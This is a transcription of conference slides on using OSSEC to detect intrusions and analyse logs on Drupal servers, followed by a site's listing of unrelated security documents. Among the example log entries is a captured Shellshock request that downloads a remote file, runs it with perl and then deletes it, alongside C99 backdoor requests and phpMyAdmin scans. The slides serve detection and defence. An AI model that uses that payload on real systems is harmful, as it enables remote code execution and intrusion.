OSSEC. Intrusion detection and response System and log analysis of Drupal sites and servers
|
|
- Kenneth Lee
- 5 years ago
- Views:
Transcription
1 OSSEC Intrusion detection and response System and log analysis of Drupal sites and servers
2 Accidental surprises November [04/Nov/2012:05:48: ] "POST %2Fxss HTTP/1.1" "-" "-" [04/Nov/2012:05:49: ] "POST q=ckeditor%2fxss HTTP/1.1" "-" "-" [04/Nov/2012:05:49: ] "GET files/wtm5439n.php HTTP/1.1" "-" "-" [04/Nov/2012:06:27: ] "POST default/files/wtm5439n.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.1" C99 (R57) shell (PHP-based Backdoor) CKeditor: arbitrary code exec (SA-CONTRIB ) Core served.php files from files dir (SA-CORE )
3 Last month s doozie /var/log/syslog Oct 20 19:58:18 example drupal: php Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (line 984 of /var/www/drupal/www/includes/database/ database.inc)
4 Shellshock /var/log/nginx/access.log [18/Oct/2014:16:50: ] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" "() { :;}; /bin/bash -c \x5cx22cd /tmp;wget /tmp/lifesux.txt;rm -rf /tmp/lifesux.txt\x5cx22" "() { :;}; /bin/bash -c \x5cx22cd /tmp;wget lifesux.txt;perl /tmp/lifesux.txt;rm -rf lifesux.txt\x5cx22"
5 What s in logs? /var/log/apache2 crawlers hunting for holes brute-forcing /user/password, /user/register error 500, 504 (gateway timeouts, slow PHP?)
6 What s in logs? /var/log/syslog (Drupal) brute forcing (in more detail) exceptions, permissions problems crashes, panics, timeouts external service drama: Mollom, Payment GW
7 What s in logs? /var/log/auth.log SSH, user/group modifications sudo vi /srv/drupal/includes/bootstrap.inc :(
8 Risk = Intrusion Bad practice ( sudo chown -R 777..) Human error Dependant services (third parties) Packages installed or removed (/var/log/apt/history.log) all has impact, all in the logs
9 ISO27001 Security is not just about intrusions Security is anything that could compromise availability, integrity, confidence, trust, reputation, money
10 What to do about it? Enter
11 OSSEC model Server->agent mode (central config, active response propagates) Local mode (standalone) Hybrid mode (multi-tier, complex topography)
12 4 main features Log analysis (What s happening now that s being logged?) Syscheck (integrity checking - what happened that left traces?) Rootcheck (rootkit detection) Active Response (what to do about it?)
13 Log Analysis What s happening? Decoders How to interpret logs (regex patterns to split up timestamps, IPs, messages) Rules Match decoded message against known issues Grade them by severity
14 Log Analysis Out of the box examples: SSH (bruteforcing, first time user logged in ) First time user executed sudo SMTP (spam relay attempts, SASL bruteforcing) Apache/Nginx issues (40Xs, 50Xs) Wordpress/Joomla brute-forcing - no Drupal :(
15 Log Analysis Drupal watchdog custom decoder (Syslog module) <decoder name="drupal"> <program_name>^drupal</program_name> <prematch>\d+.\d+.\d+.\d \S+ \d+ \w+ </prematch> <regex offset="after_prematch">(\d+.\d+.\d+.\d+)\ (\.+)\ \.*\ \d+\ \.*\ (\.+)</regex> <order>srcip,url,data</order> </decoder>
16 Log Analysis Example Drupal rules 1/3 <rule id="104110" level="3"> <decoded_as>drupal</decoded_as> " " < Use drupal decoder for this message >" <match>drupal</match> <description>drupal syslog message</description> </rule>
17 Log Analysis Example Drupal rules 2/3 <rule id="104120" level="6"> <if_sid>104110</if_sid> " " " < If this was a Drupal log message > <match>login attempt failed</match>" " < And the message contained Login attempt failed > <description>drupal failed login</description> </rule>
18 Log Analysis Example Drupal rules 3/3 <rule id="104130" level="10" frequency="4" timeframe= 360"> < Happened too many times too quickly > <if_matched_sid>104120</if_matched_sid> < Parent Drupal rule: Login attempt failed > <description>possible Drupal brute force attack </description> <description>(high number of logins).</description> </rule>
19 Log Analysis Bingo OSSEC HIDS Notification Jun 23 18:11:38 Received From: (example) >/var/log/messages Rule: fired (level 10) -> "Possible Drupal brute force attack (high number of logins)." Portion of the log(s): Jun 23 18:11:38 example drupal: user index.php?q=user/login 0 Login attempt failed for wembleylman10. Jun 23 18:11:36 example drupal: user index.php?q=user/login 0 Login attempt failed for wembleylman10. Jun 23 18:09:12 example drupal: user Login attempt failed for arrevemof. Jun 23 18:09:12 example drupal: user Login attempt failed for arrevemof. Jun 23 18:09:09 example drupal: user Login attempt failed for abralfultifug. Jun 23 18:09:09 example drupal: user Login attempt failed for abralfultifug. --END OF NOTIFICATION
20 Log Analysis Resource problems? (bottleneck/memory leak?) OSSEC HIDS Notification May 07 14:49:44 Received From: (example) >/var/log/syslog Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system." Portion of the log(s): May 7 14:49:43 example drupal: php PDOException: SQLSTATE[HY000]: General error: 1205 Lock wait timeout exceeded; try restarting transaction: DELETE FROM {XXXXXXXXX} #012WHERE (uid = :db_condition_placeholder_0) AND (subid = :db_condition_placeholder_1) ; Array#012(#012 [:db_condition_placeholder_0] => 68148#012 [:db_condition_placeholder_1] => 77217#012)#012 in XXXXXXX_update::delete() (line 652 of /var/www/drupal/www/sites/all/modules/custom/xxxxxx/xxxxx.inc). --END OF NOTIFICATION OSSEC HIDS Notification Jun 14 15:17:02 Received From: (example) >/var/log/messages Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system." Portion of the log(s): - Jun 14 15:17:02 example ool www: PHP Fatal error: Allowed memory size of bytes exhausted (tried to allocate 64 bytes) in /var/www/drupal/www/sites/ all/modules/contrib/views/modules/field/views_handler_field_field.inc on line END OF NOTIFICATION
21 Syscheck Detects when files have changed (checksums) lots of false positives due to software patching 2014 Jul 01 04:01:03 Received From: (example) >syscheck Rule: 550 fired (level 7) -> "Integrity checksum changed." Portion of the log(s): Integrity checksum changed for: '/usr/bin/ssh'" " " " " " << hopefully that s legit because you recently patched OpenSSH.. Size changed from '434024' to '641640' Old md5sum was: ' f654d7a2d7b38a0b0c09def4' New md5sum is : 'a8bf35316eb4f46e377a957ecb6cfdca' Old sha1sum was: '976af6f53338a7e9d4eb71617a2a8471aeb6937b' New sha1sum is : 'e871e0a907cdfb76c6e0722a6196b0c9f8edb1fd' --END OF NOTIFICATION what s changed?
22 Rootcheck rkhunter is great, but get a 2nd opinion Hopefully more false positives than not OSSEC HIDS Notification Nov 20 23:37:22 Received From: (example) >rootcheck Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)." Portion of the log(s): Anomaly detected in file '/tmp/#sql_1020_0.myi'. Hidden from stats, but showing up on readdir. Possible kernel level rootkit." --END OF NOTIFICATION
23 Rootcheck Gah OSSEC HIDS Notification Nov 12 09:36:16 Received From: example->rootcheck Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)." Portion of the log(s): File /var/www/sites/default/settings.php is owned by root and has written permissions to anyone." --END OF NOTIFICATION
24 Active Response OK, now what? OSSEC HIDS Notification Jun 28 21:36:54 Received From: (example) >/var/log/nginx/access.log Rule: fired (level 10) -> "Multiple web server 400 error codes from same source ip." Portion of the log(s): [28/Jun/2014:21:34: ] "GET //phpmyadmin all-languages/scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //php/phpmyadmin/scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //forum/phpmyadmin/scripts/setup.php HTTP/1.1" "-" "-" [28/Jun/2014:21:34: ] "GET //cpphpmyadmin/scripts/setup.php HTTP/1.1" "-" "-" --END OF NOTIFICATION
25 Active Response firewall-drop.sh most common response but can be anything you want null route alternative exists for systems behind NAT (where public IP blocking is useless)
26 Active Response When using server->agent model: One agent detects Every agent blocks (immediately) Can employ repeat offender punishment
27 Active Response Drupal behind loadbalancers/varnish? Make sure you have IPs logging correctly Nginx/Apache to log X-Forwarded-For as client IP $conf[ reverse_proxy ] $conf[ reverse_proxy_addresses ]
28 sucks Good for notifications. Crap to look at. (ELK demo time)
29 ELK: much nicer (demo time)
30 Mig s tips Filter out the noise to avoid monitoring fatigue tune, don t ignore rule 1002 ( Unknown Problem ) Whitelist all your IPs: don t lock yourself out OSSEC is not perfect: add defense in depth (NIDs, Cloudflare WAF, rkhunter, ClamAV)
31 Resources These slides Website Monitoring Drupal with OSSEC My quick-start install script Longer version of this talk
For Internet Facing and Private Data Systems. Functionality and Purpose
For Internet Facing and Private Data Systems Functionality and Purpose 1 Audience Prerequisites Introductions why do you want to run OSSEC? Course Overview Section 1: Functionality and Purpose Section
More informationSecuring AWS with HIDS. Gaurav Harsola Mayank Gaikwad
Securing AWS with HIDS» Gaurav Harsola Mayank Gaikwad IDS What? Why? How? Intrusion Detection System An IDS is a software application that monitors network or system activities for malicious activities.
More informationApplying Covering the Tracks from SANS Course SEC 504, Hacker Techniques, Exploits, and Incident Handling, to Mac OS X.
1 Applying Covering the Tracks from SANS Course SEC 504, Hacker Techniques, Exploits, and Incident Handling, to Mac OS X. 2 Hiding Files and Directories in Mac OS X A common method for hiding files and
More informationNetworks, WWW, HTTP. Web Technologies I. Zsolt Tóth. University of Miskolc. Zsolt Tóth (University of Miskolc) Networks, WWW, HTTP / 35
Networks, WWW, HTTP Web Technologies I. Zsolt Tóth University of Miskolc 2018 Zsolt Tóth (University of Miskolc) Networks, WWW, HTTP 2018 1 / 35 Table of Contents Networks Internet 1 Networks Internet
More informationArchitecture. Steven M. Bellovin October 31,
Architecture Steven M. Bellovin October 31, 2016 1 Web Servers and Security The Web is the most visible part of the net Two web servers Apache (open source) and Microsoft s IIS dominate the market Apache
More informationWeb Servers and Security
Web Servers and Security The Web is the most visible part of the net Two web servers Apache (open source) and Microsoft s IIS dominate the market Apache has 49%; IIS has 36% (source: http://news.netcraft.com/archives/2008/09/30/
More informationCompTIA Security+(2008 Edition) Exam
http://www.51- pass.com Exam : SY0-201 Title : CompTIA Security+(2008 Edition) Exam Version : Demo 1 / 7 1.An administrator is explaining the conditions under which penetration testing is preferred over
More informationWeb Servers and Security
Web Servers and Security The Web is the most visible part of the net Two web servers Apache (open source) and Microsoft s IIS dominate the market (Apache has 70%; IIS has 20%) Both major servers have lots
More informationArchitecture. Steven M. Bellovin October 27,
Architecture Steven M. Bellovin October 27, 2015 1 Web Servers and Security The Web is the most visible part of the net Two web servers Apache (open source) and Microsoft s IIS dominate the market Apache
More informationWebShell UDURRANI.COM
WebShell UDURRANI.COM Webshell is simply a backdoor used by attackers to enable remote administration and control. It s normally an obfuscated script i.e. php, cgi, aspx. Attacker could access webshell
More informationECE 471 Embedded Systems Lecture 22
ECE 471 Embedded Systems Lecture 22 Vince Weaver http://www.eece.maine.edu/~vweaver vincent.weaver@maine.edu 31 October 2018 Don t forget HW#7 Announcements 1 Computer Security and why it matters for embedded
More informationLecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing
Lecture Overview IN5290 Ethical Hacking Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Summary - how web sites work HTTP protocol Client side server side actions Accessing
More informationSecuring ArcGIS for Server. David Cordes, Raj Padmanabhan
Securing ArcGIS for Server David Cordes, Raj Padmanabhan Agenda Security in the context of ArcGIS for Server User and Role Considerations Identity Stores Authentication Securing web services Protecting
More informationhaltdos - Web Application Firewall
haltdos - DATASHEET Delivering best-in-class protection for modern enterprise Protect your website against OWASP top-10 & Zero-day vulnerabilities, DDoS attacks, and more... Complete Attack Protection
More informationSecurity principles Host security
Security principles Host security These materials are licensed under the Creative Commons Attribution-Noncommercial 3.0 Unported license (http://creativecommons.org/licenses/by-nc/3.0/) Host Security:
More informationDrupal Hosting. April 19, Northeast Ohio Drupal User Group 1
Northeast Ohio Drupal User Group 1 Security: PSA came out Monday regarding a d8 release for Wednesday. The notice suggested that it was a serious flaw and exploits were expected within short order after
More informationNetwork Security Terms. Based on slides from gursimrandhillon.files.wordpress.com
Network Security Terms Based on slides from gursimrandhillon.files.wordpress.com Network Security Terms Perimeter is the fortified boundary of the network that might include the following aspects: 1. Border
More informationEndpoint Protection : Last line of defense?
Endpoint Protection : Last line of defense? First TC Noumea, New Caledonia 10 Sept 2018 Independent Information Security Advisor OVERVIEW UNDERSTANDING ENDPOINT SECURITY AND THE BIG PICTURE Rapid development
More informationCIH
mitigating at host level, 23 25 at network level, 25 26 Morris worm, characteristics of, 18 Nimda worm, characteristics of, 20 22 replacement login, example of, 17 signatures. See signatures SQL Slammer
More informationSecuring CS-MARS C H A P T E R
C H A P T E R 4 Securing CS-MARS A Security Information Management (SIM) system can contain a tremendous amount of sensitive information. This is because it receives event logs from security systems throughout
More informationMIS Week 10. Operating System Security. Unix/Linux basics
MIS 5170 Operating System Security Week 10 Unix/Linux basics Tonight s Plan 2 Questions from Last Week Review on-line posts In The News Download Kali Install Kali Unix/Linux Basics Scripting Appropriate
More informationLegal Informatics, Privacy and Cyber Crime
Legal Informatics, Privacy and Cyber Crime Part Four: Defenses Sandro Etalle 03/05/2018 2017/2018 BOLOGNA BUSINESS SCHOOL Alma Mater Studiorum Università di Bologna About this part of the course Topic:
More informationIntrusion Detection and Prevention in Telecommunications Networks
Intrusion Detection and Prevention in Telecommunications Networks Tietoturvatapahtuma 2010, Helsinki February 11 Gabriel Waller, Head of Product Security Nokia Siemens Networks For Tietoturvatapahtuma
More informationUMSSIA INTRUSION DETECTION
UMSSIA INTRUSION DETECTION INTRUSION DETECTION Sensor1 Event1, Event2 Monitor No intrusion M SensorN Event1, Event2 Alarm! IDS CHARACTERISTICS Characteristics an IDS can be classified/evaluated by: Type
More informationBypassing Web Application Firewalls
Bypassing Web Application Firewalls an approach for pentesters KHALIL BIJJOU SECURITY CONSULTANT 17 th November 2017 BYPASSING A WAF WHY? Number of deployed Web Application Firewalls (WAFs) is increasing
More informationOSSEC and PCI DSS Compliance
OSSEC and PCI DSS Compliance Casey Priester CISSP CISA SSCP CEH Vice President Prometheus Global Corporation April 5, 2018 Casey Priester CISSP CISA SSCP CEH 20 years InfoSec experience Penetration Testing
More informationIntroduction to UNIX/LINUX Security. Hu Weiwei
Introduction to UNIX/LINUX Security Hu Weiwei Operation System Security The Security Problems in Operation Systems become more and more important The Security techniques improved rapidly The number of
More informationUser s Guide. SingNet Desktop Security Copyright 2010 F-Secure Corporation. All rights reserved.
User s Guide SingNet Desktop Security 2011 Copyright 2010 F-Secure Corporation. All rights reserved. Table of Contents 1. Getting Started... 1 1.1. Installing SingNet Desktop Security... 1 1.1.1. System
More informationANTIVIRUS SITE PROTECTION (by SiteGuarding.com)
ANTIVIRUS SITE PROTECTION (by SiteGuarding.com) USER GUIDE Version 1.0.0 Antivirus Site Protection (by SiteGuarding.com) 1.0.0 1 Table of content 1. INTRODUCTION. 3 2. HOW IT WORKS.... 6 3. HOW TO CONFIGURE..
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More informationLogging. About Logging. This chapter describes how to log system messages and use them for troubleshooting.
This chapter describes how to log system messages and use them for troubleshooting. About, page 1 Guidelines for, page 7 Configure, page 8 Monitoring the Logs, page 26 History for, page 29 About System
More informationIncident Response Tools
Incident Response Tools James Madison University Dept. of Computer Science June 13, 2013 1 Introduction Being successfully attacked is inevitable. A determined hacker WILL be able to penetrate your network.
More informationACS / Computer Security And Privacy. Fall 2018 Mid-Term Review
ACS-3921-001/4921-001 Computer Security And Privacy Fall 2018 Mid-Term Review ACS-3921/4921-001 Slides Used In The Course A note on the use of these slides: These slides has been adopted and/or modified
More informationSome SSH tips & tricks you may enjoy (plus, iptables)
Some SSH tips & tricks you may enjoy (plus, iptables) D. H. van Dok (Nikhef) 2014-05-19 getting the most (security) out of your openssh The user s perspective: least amount of hassle tradeoff between anxiety,
More informationCS 155 Final Exam. CS 155: Spring 2004 June 2004
CS 155: Spring 2004 June 2004 CS 155 Final Exam This exam is open books and open notes, but you may not use a laptop. You have 2 hours. Make sure you print your name legibly and sign the honor code below.
More informationPhpmyadmin Error In Processing Request Error Code 200
Phpmyadmin Error In Processing Request Error Code 200 Error in Processing Request Error code: 200. Error text: OK. Yes..the JSON will be generated, but there will be also inserted a part for "phpmyadmin".
More informationSecurity Architecture
Security Architecture We ve been looking at how particular applications are secured We need to secure not just a few particular applications, but many applications, running on separate machines We need
More informationIntrusion Detection - Snort
Intrusion Detection - Snort 1 Sometimes, Defenses Fail Our defenses aren t perfect Patches aren t applied promptly enough AV signatures not always up to date 0-days get through Someone brings in an infected
More informationA Data Driven Approach to Designing Adaptive Trustworthy Systems
A Data Driven Approach to Designing Adaptive Trustworthy Systems Ravishankar K. Iyer (with A. Sharma, K. Pattabiraman, Z. Kalbarczyk, Center for Reliable and High-Performance Computing Department of Electrical
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 19: Intrusion Detection Department of Computer Science and Engineering University at Buffalo 1 Lecture Outline Intruders Intrusion detection host-based network-based
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall 2011.
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.858 Fall 2011 Quiz I: Solutions Please do not write in the boxes below. I (xx/20) II (xx/10) III (xx/16)
More informationSecure your Web Applications with AWS WAF & AWS Shield. James Chiang ( 蔣宗恩 ) AWS Solution Architect
Secure your Web Applications with AWS WAF & AWS Shield James Chiang ( 蔣宗恩 ) AWS Solution Architect www.cloudsec.com What to expect from this session Types of Threats AWS Shield AWS WAF DEMO Real World
More information1 Installing OPI is Easy
Installing OPI is Easy 1 Installing OPI is Easy 1. Plug in the network cable to in Internet enabled port, either directly connected to the Internet or behind a router. 2. Plug connect the supplied USB
More informationScalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and Deployment in a Honeypot Environment
Scalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and Deployment in a Honeypot Environment Eric Badger Master s Student Computer Engineering 1 Overview Introduction/Motivation
More informationWB-Analysis of the Nakula & Antareja Incident
WB-Analysis of the Nakula & Antareja Incident A WB-Analysis of a system security-related incident 5.5th Bieleschweig Workshop Bielefeld, June 6-7 2005 Overview Introduction The WB-Analysis Conclusion Discussion
More informationCUSTOMER CONTROL PANEL... 2 DASHBOARD... 3 HOSTING &
Table of Contents CUSTOMER CONTROL PANEL... 2 LOGGING IN... 2 RESET YOUR PASSWORD... 2 DASHBOARD... 3 HOSTING & EMAIL... 4 WEB FORWARDING... 4 WEBSITE... 5 Usage... 5 Subdomains... 5 SSH Access... 6 File
More informationLassoing the Clouds: Best Practices on AWS. Brian DeShong May 26, 2017
Lassoing the Clouds: Best Practices on AWS Brian DeShong May 26, 2017 Who am I? Agenda Running web servers Serving static content Security-related concerns Databases Logging Regions + Availability Zones
More informationThree interface Router without NAT Cisco IOS Firewall Configuration
Three interface Router without NAT Cisco IOS Firewall Configuration Document ID: 13893 Contents Introduction Prerequisites Requirements Components Used Conventions Configure Network Diagram Configurations
More informationIntrusion Prevention Method on LKM (Loadable Kernel Module) Backdoor Attack. Ji-Ho CHO, Han LEE, Jeong-Min KIM and Geuk LEE *
2016 International Conference on Applied Mathematics and Mechanics (ICAMM 2016) ISBN: 978-1-60595-399-1 Intrusion Prevention Method on LKM (Loadable Kernel Module) Backdoor Attack Ji-Ho CHO, Han LEE, Jeong-Min
More informationIntegrating Juniper Sky Advanced Threat Prevention (ATP) and ForeScout CounterACT for Infected Host Remediation
Integrating Juniper Sky Advanced Threat Prevention (ATP) and ForeScout CounterACT for Infected Host Remediation Configuration Example March 2018 2018 Juniper Networks, Inc. Juniper Networks, Inc. 1133
More informationSimple Overflow. #include <stdio.h> int main(void){ unsigned int num = 0xffffffff;
Simple Overflow 1 #include int main(void){ unsigned int num = 0xffffffff; printf("num is %d bits long\n", sizeof(num) * 8); printf("num = 0x%x\n", num); printf("num + 1 = 0x%x\n", num + 1); }
More informationBasic Linux Security. Roman Bohuk University of Virginia
Basic Linux Security Roman Bohuk University of Virginia What is Linux? An open source operating system Project started by Linus Torvalds kernel Kernel: core program that controls everything else (controls
More informationThe Protocols that run the Internet
The Protocols that run the Internet Attack types in the Internet Seminarvortrag Sommersemester 2003 Jens Gerken Content Internet Attacks Introduction Network Service Attacks Distributed Denial of Service
More informationLassoing the Clouds: Best Practices on AWS. Brian DeShong May 26, 2017
Lassoing the Clouds: Best Practices on AWS Brian DeShong May 26, 2017 Who am I? Who am I? Who am I? Who am I? Agenda Agenda Running web servers Agenda Running web servers Serving static content Agenda
More informationAnalysis of RedHat 8.0 Honeypot Compromise
Analysis of RedHat 8.0 Honeypot Compromise Jan Göbel Laboratory for Dependable Distributed Systems, RWTH Aachen University August 3, 2006 1 Red Hat Honeypot Compromise On May 7th 2006 our Red Hat 8.0 based
More informationEmerging Threat Intelligence using IDS/IPS. Chris Arman Kiloyan
Emerging Threat Intelligence using IDS/IPS Chris Arman Kiloyan Who Am I? Chris AUA Graduate (CS) Thesis : Cyber Deception Automation and Threat Intelligence Evaluation Using IDS Integration with Next-Gen
More informationIDS / SNORT. Matsuzaki maz Yoshinobu stole slides from Fakrul Alam
IDS / SNORT Matsuzaki maz Yoshinobu stole slides from Fakrul Alam 1 Sometimes, Defenses Fail Our defenses aren t perfect Patches weren t applied promptly enough Antivirus signatures not
More informationForeScout Extended Module for Carbon Black
ForeScout Extended Module for Carbon Black Version 1.0 Table of Contents About the Carbon Black Integration... 4 Advanced Threat Detection with the IOC Scanner Plugin... 4 Use Cases... 5 Carbon Black Agent
More informationThis material is based on work supported by the National Science Foundation under Grant No
Source: http://en.wikipedia.org/wiki/file:firewall.png This material is based on work supported by the National Science Foundation under Grant No. 0802551 Any opinions, findings, and conclusions or recommendations
More informationThe Wonderful World of Services VINCE
The Wonderful World of Services VINCE Agenda definitions services for Windows and Linux breaks? auditing Linux logs for Linux useful tools Goals develop a better understanding of Linux and Windows services
More informationChair for Network Architectures and Services Department of Informatics TU München Prof. Carle. Network Security. Chapter 8
Chair for Network Architectures and Services Department of Informatics TU München Prof. Carle Network Security Chapter 8 System Vulnerabilities and Denial of Service Attacks System Vulnerabilities and
More informationFirewalls 1. Firewalls. Alexander Khodenko
Firewalls 1 Firewalls Alexander Khodenko May 01, 2003 Firewalls 2 Firewalls Firewall is defined as a linkage in a network, which relays only those data packets that are clearly intended for and authorized
More informationPc Error Code Connection Timeout Source Firewall
Pc Error Code 10060 Connection Timeout Source Firewall Socket Error 10060 is basically a connection time-out error. This error occurs when the Download Available to Completely Repair Socket Error Code
More informationCSCI 680: Computer & Network Security
CSCI 680: Computer & Network Security Lecture 15 Prof. Adwait Nadkarni Fall 2017 Derived from slides by William Enck and Micah Sherr 1 Grading Class Participat ion and Quizzes 10% Grade Breakdown Homewo
More informationAre You Avoiding These Top 10 File Transfer Risks?
Are You Avoiding These Top 10 File Transfer Risks? 1. 2. 3. 4. Today s Agenda Introduction 10 Common File Transfer Risks Brief GoAnywhere MFT Overview Question & Answer HelpSystems Corporate Overview.
More informationKaspersky Internet Security - Top 10 Internet Security Software in With Best Antivirus, Firewall,
Among the several Internet Security Suites available for the Windows operating system, is Kaspersky Internet Security (KIS). The latest version Kaspersky Internet Security is pretty impressive in terms
More informationTexSaw Penetration Te st in g
TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This
More informationDo as I Say not as I Do Stealth Modification of Programmable Logic Controllers I/O by Pin Control Attack
Do as I Say not as I Do Stealth Modification of Programmable Logic Controllers I/O by Pin Control Attack ALI ABBASI SYSSEC GROUP, RUHR UNIVERSITY BOCHUM, GERMANY & SCS GROUP UNIVERSITY OF TWENTE, NETHERLANDS
More informationWEB SECURITY p.1
WEB SECURITY 101 - p.1 spritzers - CTF team spritz.math.unipd.it/spritzers.html Disclaimer All information presented here has the only purpose to teach how vulnerabilities work. Use them to win CTFs and
More informationUsing RANCID. Contents. 1 Introduction Goals Notes Install rancid Add alias Configure rancid...
Using RANCID Contents 1 Introduction 2 1.1 Goals................................. 2 1.2 Notes................................. 2 2 Install rancid 2 2.1 Add alias............................... 3 2.2 Configure
More informationANTIVIRUS SITE PROTECTION (by SiteGuarding.com)
ANTIVIRUS SITE PROTECTION (by SiteGuarding.com) USER GUIDE Version 0.1.0 1 Table of content 1. INTRODUCTION. 3 2. HOW IT WORKS.... 6 3. HOW TO CONFIGURE.. 7 2 1. INTRODUCTION Antivirus Site Protection
More informationExplicit Information Flow in the HiStar OS. Nickolai Zeldovich, Silas Boyd-Wickizer, Eddie Kohler, David Mazières
Explicit Information Flow in the HiStar OS Nickolai Zeldovich, Silas Boyd-Wickizer, Eddie Kohler, David Mazières Too much trusted software Untrustworthy code a huge problem Users willingly run malicious
More informationAppliance Installation Guide
Appliance Installation Guide GWAVA 5 Copyright 2009. GWAVA Inc. All rights reserved. Content may not be reproduced without permission. http://www.gwava.com 1 Contents Overview... 2 Minimum System Requirements...
More information1 Installing KEEP is Easy
Installing KEEP is Easy 1 Installing KEEP is Easy 1. Plug in the network cable to in Internet enabled port, either directly connected to the Internet or behind a router. 2. Connect the power supply to
More informationLog Data: A Source of Value. Nagios Enterprises LLC Nagios Enterprises 2017 Logs: A Source of Value // 1
Log Data: A Source of Value Nagios Enterprises LLC 2017 Nagios Enterprises 2017 Logs: A Source of Value // 1 Log Data: A Source of Value Nagios Enterprises LLC 2017 Introduction Part 1 : What s in a Log?
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 12 Week of April 24, 2017 Question 1 Detection strategies (20 min) Suppose you are responsible for detecting attacks on the UC Berkeley network, and
More informationMcAfee Network Security Platform 9.1
9.1.7.15-9.1.5.9 Manager-NS-series Release Notes McAfee Network Security Platform 9.1 Revision A Contents About this release New features Enhancements Resolved issues Installation instructions Known issues
More informationAdvanced Filtering. Tobias Eggendorfer
Advanced Filtering Advanced Filtering Fails Too Overview Not so advanced Filtering Advanced Filtering Prevention Identification 2 Classic Filtering 3 Classic Filtering Black- & Whitelists 3 Classic Filtering
More informationHANDS UP IF YOU DON T HAVE A VM OR IF YOU DON T REMEMBER YOUR PASSWORDS. Or something broke
HANDS UP IF YOU DON T HAVE A VM OR IF YOU DON T REMEMBER YOUR PASSWORDS Or something broke Securing your VM 101 Getting Comfy in Linux -> Comfort ++ You After This Talk Quick recap from last week. Setup
More informationNetwork Security. Chapter 0. Attacks and Attack Detection
Network Security Chapter 0 Attacks and Attack Detection 1 Attacks and Attack Detection Have you ever been attacked (in the IT security sense)? What kind of attacks do you know? 2 What can happen? Part
More informationBrocade FOS Release v6.2.2f9 Internal Content Notes
Brocade FOS Release v6.2.2f9 Internal Content Notes The Brocade CCE process has been used to provide stable code fixes to various Brocade customer sites. The following sections document the defects and
More informationAttacking Next- Generation Firewalls
Attacking Next- Generation Firewalls Breaking PAN-OS Felix Wilhelm #whoami Security Researcher @ ERNW Research Application and Virtualization Security Recent Research Hypervisors (Xen) Security Appliances
More informationApplication security : going quicker
Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF
More informationBro: Actively defending so that you can do other stuff
Bro: Actively defending so that you can do other stuff Aashish Sharma & LBNL Cyber Security Team Lawrence Berkeley National Lab UNIVERSITY OF CALIFORNIA The goal of this talk is to provide you with detailed
More informationIntrusion Detection - Snort
Intrusion Detection - Snort Network Security Workshop 3-5 October 2017 Port Moresby, Papua New Guinea 1 Sometimes, Defenses Fail Our defenses aren t perfect Patches aren t applied promptly enough AV signatures
More informationInstalling Oxwall completely in Amazon Cloud
Contents Installing Oxwall completely in Amazon Cloud... 1 PART 1 Creating AWS Instance... 1 Section 1 Security Group... 1 Section 2 - A LAMP-friendly instance... 2 Section 3 - The Elastic IP... 5 PART
More informationIncident Response. Figure 10-1: Incident Response. Figure 10-2: Program and Data Backup. Figure 10-1: Incident Response. Figure 10-2: Program and Data
Figure 10-1: Incident Response Incident Response Chapter 10 Panko, Corporate Computer and Network Security Copyright 2004 Prentice-Hall Incidents Happen Protections sometimes break down Incident Severity
More informationPASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year
PASS4TEST \ http://www.pass4test.com We offer free update service for one year Exam : 300-210 Title : Implementing Cisco Threat Control Solutions Vendor : Cisco Version : DEMO Get Latest & Valid 300-210
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationn Learn about the Security+ exam n Learn basic terminology and the basic approaches n Implement security configuration parameters on network
Always Remember Chapter #1: Network Device Configuration There is no 100 percent secure system, and there is nothing that is foolproof! 2 Outline Learn about the Security+ exam Learn basic terminology
More informationContents. Is Rumpus Secure? 2. Use Care When Creating User Accounts 2. Managing Passwords 3. Watch Out For Symbolic Links 4. Deploy A Firewall 5
Contents Is Rumpus Secure? 2 Use Care When Creating User Accounts 2 Managing Passwords 3 Watch Out For Symbolic Links 4 Deploy A Firewall 5 Minimize Running Applications And Processes 5 Manage Physical
